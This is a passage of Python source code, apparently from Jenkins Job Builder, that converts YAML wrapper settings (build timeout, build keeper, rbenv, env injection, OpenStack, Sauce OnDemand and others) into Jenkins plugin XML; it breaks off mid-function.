    prefix = 'hudson.plugins.build__timeout.'
    twrapper = XML.SubElement(xml_parent, prefix + 'BuildTimeoutWrapper')

    # The plugin has been registered under two display names over time;
    # try the alternate name before giving up on detecting the version.
    plugin_info = registry.get_plugin_info("Build Timeout")
    if "version" not in plugin_info:
        plugin_info = registry.get_plugin_info("Jenkins build timeout plugin")
    version = plugin_info.get("version", None)
    if version:
        version = pkg_resources.parse_version(version)

    valid_strategies = ['absolute', 'no-activity', 'likely-stuck', 'elastic',
                        'deadline']

    # NOTE(toabctl): if we don't know the version assume that we
    # use a newer version of the plugin
    if not version or version >= pkg_resources.parse_version("1.14"):
        strategy = data.get('type', 'absolute')
        if strategy not in valid_strategies:
            # Bug fix: the exception used to be constructed but never
            # raised, so an invalid type silently produced a wrapper with
            # no <strategy> element at all.
            raise InvalidAttributeError('type', strategy, valid_strategies)
        if strategy == "absolute":
            strategy_element = XML.SubElement(
                twrapper, 'strategy',
                {'class': "hudson.plugins.build_timeout."
                          "impl.AbsoluteTimeOutStrategy"})
            mapping = [('timeout', 'timeoutMinutes', 3)]
            convert_mapping_to_xml(strategy_element,
                                   data, mapping, fail_required=True)
        elif strategy == "no-activity":
            strategy_element = XML.SubElement(
                twrapper, 'strategy',
                {'class': "hudson.plugins.build_timeout."
                          "impl.NoActivityTimeOutStrategy"})
            # The plugin expects seconds for this strategy; YAML is minutes.
            timeout_sec = int(data.get('timeout', 3)) * MIN_TO_SEC
            mapping = [('', 'timeoutSecondsString', timeout_sec)]
            convert_mapping_to_xml(strategy_element,
                                   data, mapping, fail_required=True)
        elif strategy == "likely-stuck":
            strategy_element = XML.SubElement(
                twrapper, 'strategy',
                {'class': "hudson.plugins.build_timeout."
                          "impl.LikelyStuckTimeOutStrategy"})
            mapping = [('timeout', 'timeoutMinutes', 3)]
            convert_mapping_to_xml(strategy_element,
                                   data, mapping, fail_required=True)
        elif strategy == "elastic":
            strategy_element = XML.SubElement(
                twrapper, 'strategy',
                {'class': "hudson.plugins.build_timeout."
                          "impl.ElasticTimeOutStrategy"})
            mapping = [
                ('elastic-percentage', 'timeoutPercentage', 0),
                ('elastic-number-builds', 'numberOfBuilds', 0),
                ('elastic-default-timeout', 'timeoutMinutesElasticDefault', 3)]
            convert_mapping_to_xml(strategy_element,
                                   data, mapping, fail_required=True)
        elif strategy == "deadline":
            strategy_element = XML.SubElement(
                twrapper, 'strategy',
                {'class': "hudson.plugins.build_timeout."
                          "impl.DeadlineTimeOutStrategy"})
            deadline_time = str(data.get('deadline-time', '0:00:00'))
            deadline_tolerance = int(data.get('deadline-tolerance', 1))
            mapping = [
                ('', 'deadlineTime', deadline_time),
                ('', 'deadlineToleranceInMinutes', deadline_tolerance)]
            convert_mapping_to_xml(strategy_element,
                                   data, mapping, fail_required=True)

        # Collect the operations to perform on timeout; "abort" is the
        # implicit default when neither fail nor abort was requested.
        actions = []

        for action in ['fail', 'abort']:
            if str(data.get(action, 'false')).lower() == 'true':
                actions.append(action)

        # Set the default action to "abort"
        if len(actions) == 0:
            actions.append("abort")

        description = data.get('write-description', None)
        if description is not None:
            actions.append('write-description')

        operation_list = XML.SubElement(twrapper, 'operationList')

        for action in actions:
            fmt_str = prefix + "operations.{0}Operation"
            if action == "abort":
                XML.SubElement(operation_list, fmt_str.format("Abort"))
            elif action == "fail":
                XML.SubElement(operation_list, fmt_str.format("Fail"))
            elif action == "write-description":
                write_description = XML.SubElement(
                    operation_list, fmt_str.format("WriteDescription"))
                XML.SubElement(write_description, "description"
                               ).text = description
            else:
                raise JenkinsJobsException("Unsupported BuiltTimeoutWrapper "
                                           "plugin action: {0}".format(action))
        mapping = [('timeout-var', 'timeoutEnvVar', None)]
        convert_mapping_to_xml(twrapper,
                               data, mapping, fail_required=False)
    else:
        # Legacy (< 1.14) flat schema: no strategy classes, everything is
        # a direct child of the wrapper element.
        mapping = [
            ('timeout', 'timeoutMinutes', 3),
            ('timeout-var', 'timeoutEnvVar', None),
            ('fail', 'failBuild', 'false'),
            ('write-description', 'writingDescription', 'false'),
            ('elastic-percentage', 'timeoutPercentage', 0),
            ('elastic-default-timeout', 'timeoutMinutesElasticDefault', 3)]
        convert_mapping_to_xml(twrapper,
                               data, mapping, fail_required=False)

        tout_type = str(data.get('type', 'absolute')).lower()
        if tout_type == 'likely-stuck':
            tout_type = 'likelyStuck'
        XML.SubElement(twrapper, 'timeoutType').text = tout_type
def timestamps(registry, xml_parent, data):
    """yaml: timestamps
    Add timestamps to the console log.
    Requires the Jenkins :jenkins-wiki:`Timestamper Plugin <Timestamper>`.
    Example::
      wrappers:
        - timestamps
    """
    # No configuration options: the bare element enables the plugin.
    wrapper_tag = 'hudson.plugins.timestamper.TimestamperBuildWrapper'
    XML.SubElement(xml_parent, wrapper_tag)
def ansicolor(registry, xml_parent, data):
    """yaml: ansicolor
    Translate ANSI color codes to HTML in the console log.
    Requires the Jenkins :jenkins-wiki:`Ansi Color Plugin <AnsiColor+Plugin>`.
    :arg string colormap: (optional) color mapping to use
    Examples::
      wrappers:
        - ansicolor
      # Explicitly setting the colormap
      wrappers:
        - ansicolor:
            colormap: vga
    """
    wrapper = XML.SubElement(
        xml_parent, 'hudson.plugins.ansicolor.AnsiColorBuildWrapper')
    # colormap is optional, hence fail_required=False.
    convert_mapping_to_xml(
        wrapper, data, [('colormap', 'colorMapName', None)],
        fail_required=False)
def build_keeper(registry, xml_parent, data):
    """yaml: build-keeper
    Keep builds based on specific policy.
    Requires the Jenkins :jenkins-wiki:`Build Keeper Plugin
    <Build+Keeper+Plugin>`.
    :arg str policy: Policy to keep builds.
        :policy values:
          * **by-day**
          * **keep-since**
          * **build-number**
          * **keep-first-failed**
    :arg int build-period: Number argument to calculate build to keep,
        depends on the policy. (default 0)
    :arg bool dont-keep-failed: Flag to indicate if to keep failed builds.
        (default false)
    :arg int number-of-fails: number of consecutive failed builds in order
        to mark first as keep forever, only applies to keep-first-failed
        policy (default 0)
    :raises InvalidAttributeError: if ``policy`` is not one of the values
        listed above.
    Example:
    .. literalinclude:: /../../tests/wrappers/fixtures/build-keeper0001.yaml
    .. literalinclude:: /../../tests/wrappers/fixtures/build-keeper0002.yaml
    """
    root = XML.SubElement(xml_parent,
                          'org.jenkins__ci.plugins.build__keeper.BuildKeeper')
    valid_policies = ('by-day', 'keep-since', 'build-number',
                      'keep-first-failed')
    # Map each YAML policy name to the plugin class implementing it.
    policy_classes = {
        'by-day': 'ByDayPolicy',
        'keep-since': 'KeepSincePolicy',
        'build-number': 'BuildNumberPolicy',
        'keep-first-failed': 'KeepFirstFailedPolicy',
    }
    policy = data.get('policy')
    if policy not in policy_classes:
        # Bug fix: the exception used to be constructed but never raised,
        # which then caused a NameError on the undefined policy_element.
        raise InvalidAttributeError('policy', policy, valid_policies)

    if policy == 'keep-first-failed':
        # This policy has its own single option.
        mapping = [('number-of-fails', 'numberOfFails', 0)]
    else:
        mapping = [
            ('build-period', 'buildPeriod', 0),
            ('dont-keep-failed', 'dontKeepFailed', False)]

    policy_element = XML.SubElement(
        root, 'policy',
        {'class': 'org.jenkins_ci.plugins.build_keeper.' +
                  policy_classes[policy]})
    convert_mapping_to_xml(policy_element, data, mapping, fail_required=True)
def live_screenshot(registry, xml_parent, data):
    """yaml: live-screenshot
    Show live screenshots of running jobs in the job list.
    Requires the Jenkins :jenkins-wiki:`Live-Screenshot Plugin
    <LiveScreenshot+Plugin>`.
    :arg str full-size: name of screenshot file (default 'screenshot.png')
    :arg str thumbnail: name of thumbnail file (default 'screenshot-thumb.png')
    File type must be .png and they must be located inside the $WORKDIR.
    Full Example:
    .. literalinclude::
        /../../tests/wrappers/fixtures/live-screenshot-full.yaml
    Minimal Example:
    .. literalinclude::
        /../../tests/wrappers/fixtures/live-screenshot-minimal.yaml
    """
    wrapper = XML.SubElement(
        xml_parent,
        'org.jenkinsci.plugins.livescreenshot.LiveScreenshotBuildWrapper',
        {'plugin': 'livescreenshot'})
    convert_mapping_to_xml(
        wrapper, data,
        [('full-size', 'fullscreenFilename', 'screenshot.png'),
         ('thumbnail', 'thumbnailFilename', 'screenshot-thumb.png')],
        fail_required=True)
def mask_passwords(registry, xml_parent, data):
    """yaml: mask-passwords
    Hide passwords in the console log.
    Requires the Jenkins :jenkins-wiki:`Mask Passwords Plugin
    <Mask+Passwords+Plugin>`.
    Example::
      wrappers:
        - mask-passwords
    """
    # No options: the bare element activates the plugin.
    wrapper_tag = ('com.michelin.cio.hudson.plugins.maskpasswords.'
                   'MaskPasswordsBuildWrapper')
    XML.SubElement(xml_parent, wrapper_tag)
def workspace_cleanup(registry, xml_parent, data):
    """yaml: workspace-cleanup (pre-build)
    Requires the Jenkins :jenkins-wiki:`Workspace Cleanup Plugin
    <Workspace+Cleanup+Plugin>`.
    The post-build workspace-cleanup is available as a publisher.
    :arg list include: list of files to be included
    :arg list exclude: list of files to be excluded
    :arg bool dirmatch: Apply pattern to directories too (default false)
    :arg str check-parameter: boolean environment variable to check to
        determine whether to actually clean up
    :arg str external-deletion-command: external deletion command to run
        against files and directories
    Full Example:
    .. literalinclude::
        /../../tests/wrappers/fixtures/workspace-cleanup-full.yaml
       :language: yaml
    Minimal Example:
    .. literalinclude::
        /../../tests/wrappers/fixtures/workspace-cleanup-min.yaml
       :language: yaml
    """
    cleanup = XML.SubElement(
        xml_parent, 'hudson.plugins.ws__cleanup.PreBuildCleanup',
        {'plugin': 'ws-cleanup'})
    # Only emit a <patterns> container when the user configured either list.
    if "include" in data or "exclude" in data:
        patterns = XML.SubElement(cleanup, 'patterns')
    for option, pattern_type in (("include", "INCLUDE"),
                                 ("exclude", "EXCLUDE")):
        for value in data.get(option, []):
            pattern = XML.SubElement(
                patterns, 'hudson.plugins.ws__cleanup.Pattern')
            convert_mapping_to_xml(
                pattern, data,
                [('', 'pattern', value), ('', 'type', pattern_type)],
                fail_required=True)
    convert_mapping_to_xml(
        cleanup, data,
        [("dirmatch", 'deleteDirs', False),
         ('check-parameter', 'cleanupParameter', ''),
         ('external-deletion-command', 'externalDelete', '')],
        fail_required=True)
def m2_repository_cleanup(registry, xml_parent, data):
    """yaml: m2-repository-cleanup
    Configure M2 Repository Cleanup
    Requires the Jenkins :jenkins-wiki:`M2 Repository Cleanup
    <M2+Repository+Cleanup+Plugin>`.
    :arg list patterns: List of patterns for artifacts to cleanup before
       building. (optional)
    This plugin allows you to configure a maven2 job to clean some or all of
    the artifacts from the repository before it runs.
    Example:
    .. literalinclude:: \
            ../../tests/wrappers/fixtures/m2-repository-cleanup001.yaml
    """
    reaper = XML.SubElement(
        xml_parent,
        'hudson.plugins.m2__repo__reaper.M2RepoReaperWrapper',
        {'plugin': 'm2-repo-reaper'})
    patterns = data.get("patterns", [])
    # The plugin stores the patterns twice: a comma-joined attribute string
    # and an explicit list of <string> elements.
    XML.SubElement(reaper, 'artifactPatterns').text = ",".join(patterns)
    pattern_list = XML.SubElement(reaper, 'patterns')
    for pattern in patterns:
        XML.SubElement(pattern_list, 'string').text = pattern
def rvm_env(registry, xml_parent, data):
    """yaml: rvm-env
    Set the RVM implementation
    Requires the Jenkins :jenkins-wiki:`Rvm Plugin <RVM+Plugin>`.
    :arg str implementation: Type of implementation. Syntax is RUBY[@GEMSET],
        such as '1.9.3' or 'jruby@foo'.
    Example::
      wrappers:
        - rvm-env:
            implementation: 1.9.3
    """
    # Ruby-based plugin: serialized through the ruby-proxy-object structure.
    proxy = XML.SubElement(xml_parent, 'ruby-proxy-object')
    wrapper = XML.SubElement(
        proxy, 'ruby-object',
        {'ruby-class': "Jenkins::Plugin::Proxies::BuildWrapper",
         'pluginid': 'rvm'})
    rvm_obj = XML.SubElement(
        wrapper, 'object',
        {'ruby-class': 'RvmWrapper', 'pluginid': 'rvm'})
    XML.SubElement(
        rvm_obj, 'impl',
        {'pluginid': 'rvm', 'ruby-class': 'String'}
    ).text = data['implementation']
    XML.SubElement(
        wrapper, 'pluginid',
        {'pluginid': 'rvm', 'ruby-class': 'String'}).text = "rvm"
def rbenv(registry, xml_parent, data):
    """yaml: rbenv
    Set the rbenv implementation.
    Requires the Jenkins :jenkins-wiki:`rbenv plugin <rbenv+plugin>`.
    All parameters are optional.
    :arg str ruby-version: Version of Ruby to use  (default 1.9.3-p484)
    :arg bool ignore-local-version: If true, ignore local Ruby
        version (defined in the ".ruby-version" file in workspace) even if it
        has been defined  (default false)
    :arg str preinstall-gem-list: List of gems to install
        (default 'bundler,rake')
    :arg str rbenv-root: RBENV_ROOT  (default $HOME/.rbenv)
    :arg str rbenv-repo: Which repo to clone rbenv from
        (default https://github.com/rbenv/rbenv)
    :arg str rbenv-branch: Which branch to clone rbenv from  (default master)
    :arg str ruby-build-repo: Which repo to clone ruby-build from
        (default https://github.com/rbenv/ruby-build)
    :arg str ruby-build-branch: Which branch to clone ruby-build from
        (default master)
    Example:
    .. literalinclude:: /../../tests/wrappers/fixtures/rbenv003.yaml
    """
    # option name -> XML element name, default value. All values are
    # serialized as Ruby String objects.
    mapping = [
        ("preinstall-gem-list", 'gem__list', 'bundler,rake'),
        ("rbenv-root", 'rbenv__root', '$HOME/.rbenv'),
        ("rbenv-repo", 'rbenv__repository',
            'https://github.com/rbenv/rbenv'),
        ("rbenv-branch", 'rbenv__revision', 'master'),
        ("ruby-build-repo", 'ruby__build__repository',
            'https://github.com/rbenv/ruby-build'),
        ("ruby-build-branch", 'ruby__build__revision', 'master'),
        ("ruby-version", 'version', '1.9.3-p484'),
    ]

    rpo = XML.SubElement(xml_parent, 'ruby-proxy-object')
    ro = XML.SubElement(
        rpo, 'ruby-object',
        {'ruby-class': "Jenkins::Tasks::BuildWrapperProxy",
         'pluginid': 'rbenv'})
    XML.SubElement(
        ro, 'pluginid',
        {'pluginid': "rbenv", 'ruby-class': "String"}).text = "rbenv"
    o = XML.SubElement(
        ro, 'object',
        {'ruby-class': 'RbenvWrapper', 'pluginid': 'rbenv'})
    for optname, xmlname, default in mapping:
        value = data.get(optname, default)
        elem = XML.SubElement(
            o, xmlname,
            {'ruby-class': "String", 'pluginid': "rbenv"})
        # Booleans must be rendered as lower-case strings for the plugin.
        # (Was `type(val) == bool`; isinstance is the idiomatic check.)
        elem.text = str(value).lower() if isinstance(value, bool) else value

    # ignore-local-version is serialized as a Ruby boolean class name
    # rather than element text.
    ignore_local_class = 'FalseClass'
    if 'ignore-local-version' in data:
        if str(data['ignore-local-version']).lower() == 'true':
            ignore_local_class = 'TrueClass'
    XML.SubElement(
        o, 'ignore__local__version',
        {'ruby-class': ignore_local_class, 'pluginid': 'rbenv'})
def build_name(registry, xml_parent, data):
    """yaml: build-name
    Set the name of the build
    Requires the Jenkins :jenkins-wiki:`Build Name Setter Plugin
    <Build+Name+Setter+Plugin>`.
    :arg str name: Name for the build.  Typically you would use a variable
        from Jenkins in the name.  The syntax would be ${FOO} for
        the FOO variable.
    Example::
      wrappers:
        - build-name:
            name: Build-${FOO}
    """
    setter = XML.SubElement(
        xml_parent,
        'org.jenkinsci.plugins.buildnamesetter.BuildNameSetter')
    # 'name' is mandatory, hence fail_required=True.
    convert_mapping_to_xml(
        setter, data, [('name', 'template', None)], fail_required=True)
def port_allocator(registry, xml_parent, data):
    """yaml: port-allocator
    Assign unique TCP port numbers
    Requires the Jenkins :jenkins-wiki:`Port Allocator Plugin
    <Port+Allocator+Plugin>`.
    :arg str name: Deprecated, use names instead
    :arg list names: Variable list of names of the port or list of
        specific port numbers
    Example:
    .. literalinclude::  /../../tests/wrappers/fixtures/port-allocator002.yaml
    """
    allocator = XML.SubElement(xml_parent,
                               'org.jvnet.hudson.plugins.port__allocator.'
                               'PortAllocator')
    ports = XML.SubElement(allocator, 'ports')
    names = data.get('names')
    if not names:
        # Backwards compatibility with the deprecated singular 'name' key.
        logging.getLogger(__name__).warning(
            'port_allocator name is deprecated, use a names list '
            ' instead')
        names = [data['name']]
    for port_name in names:
        port = XML.SubElement(ports,
                              'org.jvnet.hudson.plugins.port__allocator.'
                              'DefaultPortType')
        XML.SubElement(port, 'name').text = port_name
def locks(registry, xml_parent, data):
    """yaml: locks
    Control parallel execution of jobs.
    Requires the Jenkins :jenkins-wiki:`Locks and Latches Plugin
    <Locks+and+Latches+plugin>`.
    :arg: list of locks to use
    Example:
    .. literalinclude::  /../../tests/wrappers/fixtures/locks002.yaml
       :language: yaml
    """
    # Emit nothing at all when no locks are configured.
    if not data:
        return
    wrapper = XML.SubElement(
        xml_parent, 'hudson.plugins.locksandlatches.LockWrapper')
    lock_list = XML.SubElement(wrapper, 'locks')
    for lock_name in data:
        entry = XML.SubElement(lock_list,
                               'hudson.plugins.locksandlatches.'
                               'LockWrapper_-LockWaitConfig')
        XML.SubElement(entry, 'name').text = lock_name
def copy_to_slave(registry, xml_parent, data):
    """yaml: copy-to-slave
    Copy files to slave before build
    Requires the Jenkins :jenkins-wiki:`Copy To Slave Plugin
    <Copy+To+Slave+Plugin>`.
    :arg list includes: list of file patterns to copy (optional)
    :arg list excludes: list of file patterns to exclude (optional)
    :arg bool flatten: flatten directory structure (default false)
    :arg str relative-to: base location of includes/excludes, must be home
        ($JENKINS_HOME), somewhereElse ($JENKINS_HOME/copyToSlave),
        userContent ($JENKINS_HOME/userContent) or workspace
        (default userContent)
    :arg bool include-ant-excludes: exclude ant's default excludes
        (default false)
    Minimal Example:
    .. literalinclude::  /../../tests/wrappers/fixtures/copy-to-slave001.yaml
       :language: yaml
    Full Example:
    .. literalinclude::  /../../tests/wrappers/fixtures/copy-to-slave002.yaml
       :language: yaml
    """
    wrapper = XML.SubElement(
        xml_parent,
        'com.michelin.cio.hudson.plugins.copytoslave.'
        'CopyToSlaveBuildWrapper')
    # Both pattern lists are serialized as comma-joined strings; an empty
    # element is still emitted when the option is absent.
    for option in ('includes', 'excludes'):
        XML.SubElement(wrapper, option).text = ','.join(
            data.get(option, ['']))
    locations = ['home', 'somewhereElse', 'userContent', 'workspace']
    convert_mapping_to_xml(
        wrapper, data,
        [('flatten', 'flatten', False),
         ('include-ant-excludes', 'includeAntExcludes', False),
         ('relative-to', 'relativeTo', 'userContent', locations),
         ('', 'hudsonHomeRelative', False)],
        fail_required=True)
def inject(registry, xml_parent, data):
    """yaml: inject
    Add or override environment variables to the whole build process
    Requires the Jenkins :jenkins-wiki:`EnvInject Plugin <EnvInject+Plugin>`.
    :arg str properties-file: path to the properties file (optional)
    :arg str properties-content: key value pair of properties (optional)
    :arg str script-file: path to the script file (optional)
    :arg str script-content: contents of a script (optional)
    :arg bool load-from-master: load files from master (default false)
    Example::
      wrappers:
        - inject:
            properties-file: /usr/local/foo
            properties-content: PATH=/foo/bar
            script-file: /usr/local/foo.sh
            script-content: echo $PATH
    """
    wrapper = XML.SubElement(xml_parent, 'EnvInjectBuildWrapper')
    info = XML.SubElement(wrapper, 'info')
    # Every option is optional, hence fail_required=False.
    convert_mapping_to_xml(
        info, data,
        [('properties-file', 'propertiesFilePath', None),
         ('properties-content', 'propertiesContent', None),
         ('script-file', 'scriptFilePath', None),
         ('script-content', 'scriptContent', None),
         ('load-from-master', 'loadFilesFromMaster', False)],
        fail_required=False)
def inject_ownership_variables(registry, xml_parent, data):
    """yaml: inject-ownership-variables
    Inject ownership variables to the build as environment variables.
    Requires the Jenkins :jenkins-wiki:`EnvInject Plugin <EnvInject+Plugin>`
    and Jenkins :jenkins-wiki:`Ownership plugin <Ownership+Plugin>`.
    :arg bool job-variables: inject job ownership variables to the job
        (default false)
    :arg bool node-variables: inject node ownership variables to the job
        (default false)
    Example:
    .. literalinclude:: /../../tests/wrappers/fixtures/ownership001.yaml
    """
    wrapper = XML.SubElement(
        xml_parent,
        'com.synopsys.arc.jenkins.plugins.'
        'ownership.wrappers.OwnershipBuildWrapper')
    convert_mapping_to_xml(
        wrapper, data,
        [('node-variables', 'injectNodeOwnership', False),
         ('job-variables', 'injectJobOwnership', False)],
        fail_required=True)
def inject_passwords(registry, xml_parent, data):
    """yaml: inject-passwords
    Inject passwords to the build as environment variables.
    Requires the Jenkins :jenkins-wiki:`EnvInject Plugin <EnvInject+Plugin>`.
    :arg bool global: inject global passwords to the job
    :arg bool mask-password-params: mask password parameters
    :arg list job-passwords: key value pair of job passwords
        :Parameter: * **name** (`str`) Name of password
                    * **password** (`str`) Encrypted password
    Example:
    .. literalinclude:: /../../tests/wrappers/fixtures/passwords001.yaml
    """
    wrapper = XML.SubElement(xml_parent, 'EnvInjectPasswordWrapper')
    # Both flags default to false and are serialized lower-case.
    for option, tag in (('global', 'injectGlobalPasswords'),
                        ('mask-password-params', 'maskPasswordParameters')):
        XML.SubElement(wrapper, tag).text = str(
            data.get(option, False)).lower()
    entries = XML.SubElement(wrapper, 'passwordEntries')
    for password in data.get('job-passwords', []):
        entry = XML.SubElement(entries, 'EnvInjectPasswordEntry')
        XML.SubElement(entry, 'name').text = password['name']
        XML.SubElement(entry, 'value').text = password['password']
def env_file(registry, xml_parent, data):
    """yaml: env-file
    Add or override environment variables to the whole build process
    Requires the Jenkins :jenkins-wiki:`Environment File Plugin
    <Envfile+Plugin>`.
    :arg str properties-file: path to the properties file (optional)
    Example::
      wrappers:
        - env-file:
            properties-file: ${WORKSPACE}/foo
    """
    wrapper = XML.SubElement(
        xml_parent, 'hudson.plugins.envfile.EnvFileBuildWrapper')
    # properties-file is optional, hence fail_required=False.
    convert_mapping_to_xml(
        wrapper, data, [('properties-file', 'filePath', None)],
        fail_required=False)
def env_script(registry, xml_parent, data):
    """yaml: env-script
    Add or override environment variables to the whole build process.
    Requires the Jenkins :jenkins-wiki:`Environment Script Plugin
    <Environment+Script+Plugin>`.
    :arg script-content: The script to run (default '')
    :arg str script-type: The script type.
        :script-types supported:
            * **unix-script** (default)
            * **power-shell**
            * **batch-script**
    :arg only-run-on-parent: Only applicable for Matrix Jobs. If true, run only
        on the matrix parent job (default false)
    Example:
    .. literalinclude:: /../../tests/wrappers/fixtures/env-script001.yaml
    """
    wrapper = XML.SubElement(
        xml_parent, 'com.lookout.jenkins.EnvironmentScript')
    # YAML script-type names mapped to the plugin's internal identifiers.
    script_types = {
        'unix-script': 'unixScript',
        'power-shell': 'powerShell',
        'batch-script': 'batchScript',
    }
    convert_mapping_to_xml(
        wrapper, data,
        [('script-content', 'script', ''),
         ('script-type', 'scriptType', 'unix-script', script_types),
         ('only-run-on-parent', 'onlyRunOnParent', False)],
        fail_required=True)
def jclouds(registry, xml_parent, data):
    """yaml: jclouds
    Uses JClouds to provide slave launching on most of the currently
    usable Cloud infrastructures.

    Requires the Jenkins :jenkins-wiki:`JClouds Plugin <JClouds+Plugin>`.

    :arg bool single-use: Whether or not to terminate the slave after use
        (default false).
    :arg list instances: The name of the jclouds template to create an
        instance from, and its parameters.
    :arg str cloud-name: The name of the jclouds profile containing the
        specified template.
    :arg int count: How many instances to create (default 1).
    :arg bool stop-on-terminate: Whether or not to suspend instead of
        terminate the instance (default false).

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/jclouds001.yaml
       :language: yaml
    """
    if 'instances' in data:
        wrapper = XML.SubElement(
            xml_parent,
            'jenkins.plugins.jclouds.compute.JCloudsBuildWrapper')
        to_run = XML.SubElement(wrapper, 'instancesToRun')
        # Each list entry maps a template name to its launch parameters.
        for entry in data['instances']:
            for template_name, opts in entry.items():
                node = XML.SubElement(
                    to_run,
                    'jenkins.plugins.jclouds.compute.InstancesToRun')
                XML.SubElement(node, 'templateName').text = template_name
                XML.SubElement(node, 'cloudName').text = opts.get(
                    'cloud-name', '')
                XML.SubElement(node, 'count').text = str(
                    opts.get('count', 1))
                XML.SubElement(node, 'suspendOrTerminate').text = str(
                    opts.get('stop-on-terminate', False)).lower()
    if data.get('single-use'):
        XML.SubElement(
            xml_parent,
            'jenkins.plugins.jclouds.compute.JCloudsOneOffSlave')
def openstack(registry, xml_parent, data):
    """yaml: openstack
    Provision slaves from OpenStack on demand. Requires the Jenkins
    :jenkins-wiki:`Openstack Cloud Plugin <Openstack+Cloud+Plugin>`.

    :arg list instances: List of instances to be launched at the beginning
        of the build.

        :instances:
            * **cloud-name** (`str`) -- The name of the cloud profile which
              contains the specified cloud instance template (required).
            * **template-name** (`str`) -- The name of the cloud instance
              template to create an instance from(required).
            * **manual-template** (`bool`) -- If True, instance template
              name will be put in 'Specify Template Name as String' option.
              Not specifying or specifying False, instance template name
              will be put in 'Select Template from List' option. To use
              parameter replacement, set this to True. (default false)
            * **count** (`int`) -- How many instances to create
              (default 1).

    :arg bool single-use: Whether or not to terminate the slave after use
        (default false).

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/openstack001.yaml
    """
    prefix = 'jenkins.plugins.openstack.compute.'
    if 'instances' in data:
        wrapper = XML.SubElement(xml_parent, prefix + 'JCloudsBuildWrapper')
        to_run = XML.SubElement(wrapper, 'instancesToRun')
        for instance in data['instances']:
            node = XML.SubElement(to_run, prefix + 'InstancesToRun')
            mapping = [
                ('cloud-name', 'cloudName', None),
                ('count', 'count', 1),
            ]
            # 'manual-template' selects which XML tag holds the template
            # name ("as String" vs "from List").
            if instance.get('manual-template', False):
                template_tag = 'manualTemplateName'
            else:
                template_tag = 'templateName'
            mapping.append(('template-name', template_tag, None))
            convert_mapping_to_xml(node, instance, mapping,
                                   fail_required=True)
    if data.get('single-use', False):
        XML.SubElement(xml_parent, prefix + 'JCloudsOneOffSlave')
def build_user_vars(registry, xml_parent, data):
    """yaml: build-user-vars
    Set environment variables describing the user who started the build.

    Requires the Jenkins :jenkins-wiki:`Build User Vars Plugin
    <Build+User+Vars+Plugin>`.

    Example::

      wrappers:
        - build-user-vars
    """
    # The plugin takes no configuration; the bare element enables it.
    XML.SubElement(xml_parent, 'org.jenkinsci.plugins.builduser.BuildUser')
def release(registry, xml_parent, data):
    """yaml: release
    Add release build configuration
    Requires the Jenkins :jenkins-wiki:`Release Plugin <Release+Plugin>`.

    :arg bool keep-forever: Keep build forever (default true)
    :arg bool override-build-parameters: Enable build-parameter override
        (default false)
    :arg string version-template: Release version template (default '')
    :arg list parameters: Release parameters (see the :ref:`Parameters`
        module)
    :arg list pre-build: Pre-build steps (see the :ref:`Builders` module)
    :arg list post-build: Post-build steps (see :ref:`Builders`)
    :arg list post-success: Post successful-build steps (see :ref:`Builders`)
    :arg list post-fail: Post failed-build steps (see :ref:`Builders`)

    Example:

    .. literalinclude:: /../../tests/wrappers/fixtures/release001.yaml
    """
    relwrap = XML.SubElement(xml_parent,
                             'hudson.plugins.release.ReleaseWrapper')
    # For 'keep-forever', the sense of the XML flag is the opposite of
    # the YAML flag.
    no_keep_forever = 'false'
    if str(data.get('keep-forever', True)).lower() == 'false':
        no_keep_forever = 'true'
    XML.SubElement(relwrap, 'doNotKeepLog').text = no_keep_forever
    XML.SubElement(relwrap, 'overrideBuildParameters').text = str(
        data.get('override-build-parameters', False)).lower()
    XML.SubElement(relwrap, 'releaseVersionTemplate').text = data.get(
        'version-template', '')
    parameters = data.get('parameters', [])
    if parameters:
        pdef = XML.SubElement(relwrap, 'parameterDefinitions')
        for param in parameters:
            registry.dispatch('parameter', pdef, param)
    # Map each YAML step list onto its plugin XML container; each builder
    # in a list gets its own container element (matches plugin behavior).
    builder_steps = {
        'pre-build': 'preBuildSteps',
        'post-build': 'postBuildSteps',
        'post-success': 'postSuccessfulBuildSteps',
        'post-fail': 'postFailedBuildSteps',
    }
    for step, tag in builder_steps.items():
        for builder in data.get(step, []):
            registry.dispatch('builder', XML.SubElement(relwrap, tag),
                              builder)
def sauce_ondemand(registry, xml_parent, data):
    """yaml: sauce-ondemand
    Allows you to integrate Sauce OnDemand with Jenkins. You can
    automate the setup and tear down of Sauce Connect and integrate
    the Sauce OnDemand results videos per test. Requires the Jenkins
    :jenkins-wiki:`Sauce OnDemand Plugin <Sauce+OnDemand+Plugin>`.

    :arg bool enable-sauce-connect: launches a SSH tunnel from their cloud
        to your private network (default false)
    :arg str sauce-host: The name of the selenium host to be used. For
        tests run using Sauce Connect, this should be localhost.
        ondemand.saucelabs.com can also be used to conenct directly to
        Sauce OnDemand, The value of the host will be stored in the
        SAUCE_ONDEMAND_HOST environment variable. (default '')
    :arg str sauce-port: The name of the Selenium Port to be used. For
        tests run using Sauce Connect, this should be 4445. If using
        ondemand.saucelabs.com for the Selenium Host, then use 4444.
        The value of the port will be stored in the SAUCE_ONDEMAND_PORT
        environment variable. (default '')
    :arg str override-username: If set then api-access-key must be set.
        Overrides the username from the global config. (default '')
    :arg str override-api-access-key: If set then username must be set.
        Overrides the api-access-key set in the global config. (default '')
    :arg str starting-url: The value set here will be stored in the
        SELENIUM_STARTING_ULR environment variable. Only used when type
        is selenium. (default '')
    :arg str type: Type of test to run (default selenium)

        :type values:
            * **selenium**
            * **webdriver**
    :arg list platforms: The platforms to run the tests on. Platforms
        supported are dynamically retrieved from sauce labs. The format of
        the values has only the first letter capitalized, no spaces,
        underscore between os and version, underscore in internet_explorer,
        everything else is run together. If there are not multiple version
        of the browser then just the first version number is used.
        Examples: Mac_10.8iphone5.1 or Windows_2003firefox10
        or Windows_2012internet_explorer10 (default '')
    :arg bool launch-sauce-connect-on-slave: Whether to launch sauce connect
        on the slave. (default false)
    :arg str https-protocol: The https protocol to use (default '')
    :arg str sauce-connect-options: Options to pass to sauce connect
        (default '')

    Example::

      wrappers:
        - sauce-ondemand:
            enable-sauce-connect: true
            sauce-host: foo
            sauce-port: 8080
            override-username: foo
            override-api-access-key: 123lkj123kh123l;k12323
            type: webdriver
            platforms:
              - Linuxandroid4
              - Linuxfirefox10
              - Linuxfirefox11
            launch-sauce-connect-on-slave: true
    """
    sauce = XML.SubElement(xml_parent, 'hudson.plugins.sauce__ondemand.'
                           'SauceOnDemandBuildWrapper')
    mapping = [
